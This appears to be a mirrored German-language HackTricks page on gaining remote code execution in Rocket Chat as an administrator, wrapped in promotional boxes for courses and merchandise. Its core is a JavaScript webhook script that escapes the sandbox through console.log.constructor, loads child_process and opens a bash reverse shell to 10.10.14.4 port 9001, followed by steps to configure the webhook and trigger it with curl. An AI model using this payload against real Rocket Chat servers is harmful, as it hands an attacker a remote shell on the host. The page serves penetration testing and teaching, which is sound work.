mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 02:53:28 +00:00
67 lines
4.2 KiB
Markdown
67 lines
4.2 KiB
Markdown
# Rocket Chat
|
|
|
|
<details>
|
|
|
|
<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
|
|
|
|
</details>
|
|
|
|
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
|
|
|
{% embed url="https://websec.nl/" %}
|
|
|
|
## RCE
|
|
|
|
Wenn Sie Administrator in Rocket Chat sind, können Sie RCE erhalten.
|
|
|
|
* Gehen Sie zu **`Integrations`** und wählen Sie **`Neue Integration`** und wählen Sie eine beliebige: **`Eingehender WebHook`** oder **`Ausgehender WebHook`**.
|
|
* `/admin/integrations/incoming`
|
|
|
|
<figure><img src="../../.gitbook/assets/image (266).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* Gemäß der [Dokumentation](https://docs.rocket.chat/guides/administration/admin-panel/integrations) verwenden beide ES2015 / ECMAScript 6 ([im Grunde JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)), um die Daten zu verarbeiten. Also lassen Sie uns eine [Rev-Shell für JavaScript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) wie folgt erhalten:
|
|
```javascript
|
|
const require = console.log.constructor('return process.mainModule.require')();
|
|
const { exec } = require('child_process');
|
|
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
|
```
|
|
* Konfiguriere den WebHook (der Kanal und der Benutzername müssen vorhanden sein):
|
|
|
|
<figure><img src="../../.gitbook/assets/image (905).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* Konfiguriere das WebHook-Skript:
|
|
|
|
<figure><img src="../../.gitbook/assets/image (572).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* Speichere die Änderungen
|
|
* Erhalte die generierte WebHook-URL:
|
|
|
|
<figure><img src="../../.gitbook/assets/image (937).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* Rufe sie mit curl auf und du solltest die Reverse-Shell erhalten
|
|
|
|
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
|
|
|
{% embed url="https://websec.nl/" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>Lerne AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn du deine **Firma in HackTricks beworben sehen möchtest** oder **HackTricks als PDF herunterladen möchtest**, überprüfe die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Hol dir das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
|
|
* Entdecke [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Trete der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folge** uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Teile deine Hacking-Tricks, indem du PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichst.
|
|
|
|
</details>
|